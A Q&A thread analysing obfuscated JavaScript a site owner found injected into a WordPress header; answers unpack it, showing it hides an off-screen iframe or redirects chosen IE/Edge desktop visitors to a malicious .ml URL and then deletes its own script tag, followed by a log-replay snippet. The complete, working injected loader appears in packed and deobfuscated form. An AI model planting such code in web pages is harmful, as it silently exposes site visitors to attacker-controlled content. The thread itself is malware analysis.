Suspicious JavaScript in website header

22

I'm not sure if this is the right place to ask questions like this; apologies if it isn't.

I found the following code in the header of one of my WordPress websites. I'm fairly sure it is malicious and I have removed it. However, I'm curious and can't work out what its purpose is.

Can anyone provide any insight?

Base64 encoded:


Actual code:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\"3G:3F;3C:-3D;\"><1y 3E=\"1l\" 3q=\""+G+"\" 3p=\"1l\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\d+|4h).+1h|4i|4j\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\-(n|u)|25\/|33|2Q|2R\-|2P|2O|2L|2M\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\-s|2z|2w|2v|1i(c|p)o|2s(12|\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\-|1q)|1L u|2J|2W|2Y\-5|g\-15|1c(\.w|1d)|31(30|2U)|2r|2T|2S\-(m|p|t)|4e\-|4D(1G|1F)|6m( i|1u)|6n\-c|6o(c(\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\-(20|1c|X)|6q|4v( |\-|\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\/)|5U|5V |5W\-|5X(c|k)|65(66|6c)|6d( g|\/(k|l|u)|50|54|\-[a-w])|68|69|6z\-w|72|73\/|X(T|74|71)|1z(F|21|1n)|m\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\-| |o|v)|77)|78(50|6U|v 
)|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\-2|59(1U|58|1s)|55|56|1G\-g|57\-a|4P(4C|12|21|32|60|\-[2-7]|i\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\-|1x|p\-)|5G\/|1s(c(\-|0|1)|47|1z|1E|1D)|5A\-|5B|5C(\-|m)|5I\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\-|v\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\-|5o\-|5p(i|m)|5v\-|t\-15|5x(1K|5u)|1J(70|m\-|5q|5r)|5s\-9|1H(\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\-|67|6a|6b\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|ch
tm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
    
asked by bf2mad 15.10.2015 - 14:52

4 answers

21

It looks like the "real code" you posted is packed using [link]. When you unpack it you get

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Which is still somewhat obfuscated by the use of "random" variable names. You can still see that the code is trying to redirect you to:

hxxp://miwkavoriwka.ml/052F

Does anyone know what this site is for?

    
answered by Gudradain 15.10.2015 - 15:41
17

I deobfuscated the code a bit:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// Some capability check
// Possibly another mobile phone check?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, including FF's malware and phishing protection list) in an iframe or redirects to that URL (depending on your browser).

edit: After reading the code a bit more: the only browsers that seem to be targeted are those where these conditions are met:

  • User agents containing MSIE, Trident/ or Edge/
  • Not a mobile phone? (see the is_mobile_phone function)
  • Some capability checks are true (see the some_capability_check function)
answered by SleepProgger 15.10.2015 - 16:06
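
The targeting conditions listed in the answer above can be replayed over web server access logs to estimate which visitors were served the hidden iframe. This is an added example, not code from the thread: the log lines are constructed, the capability checks are assumed to pass because logs cannot show them, and only the first of the script's two mobile patterns is used.

```javascript
// Added example: replay the script's browser targeting over access-log lines.

// First mobile pattern from is_mobile_phone() on this page. The second pattern
// (a table of 4-character user-agent prefixes) is left out of this sketch.
const MOBILE_UA = /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i;

// Mirrors test_for_sepcific_user_agents(): IE/Edge major version, or false.
function ieVersion(ua) {
  const probes = [['MSIE ', 'MSIE '], ['Trident/', 'rv:'], ['Edge/', 'Edge/']];
  for (const [marker, prefix] of probes) {
    if (ua.indexOf(marker) > 0) {
      const start = ua.indexOf(prefix);
      return parseInt(ua.substring(start + prefix.length, ua.indexOf('.', start)), 10);
    }
  }
  return false;
}

// The iframe branch runs when the IE/Edge test and the capability check pass
// and the mobile test fails. Logs cannot show the capability check, so it is
// assumed to pass here, which makes the result an upper bound.
function isTargeted(ua) {
  return Boolean(ieVersion(ua)) && !MOBILE_UA.test(ua.toLowerCase());
}

// Combined log format: client address first, user agent as last quoted field.
function parseLine(line) {
  const m = /^(\S+) .*"([^"]*)"\s*$/.exec(line);
  return m ? { ip: m[1], ua: m[2] } : null;
}

// Returns one record per log line whose user agent matched the targeting.
function exposedClients(lines) {
  return lines
    .map(parseLine)
    .filter((entry) => entry && isTargeted(entry.ua))
    .map((entry) => ({ ip: entry.ip, version: ieVersion(entry.ua) }));
}

// Constructed sample lines (192.0.2.0/24 is a documentation address range).
const SAMPLE_LOG = [
  '192.0.2.10 - - [15/Oct/2015:13:01:07 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
  '192.0.2.11 - - [15/Oct/2015:13:02:40 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"',
  '192.0.2.12 - - [15/Oct/2015:13:03:12 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"',
  '192.0.2.13 - - [15/Oct/2015:13:04:55 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"',
  '192.0.2.14 - - [15/Oct/2015:13:05:31 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"',
];

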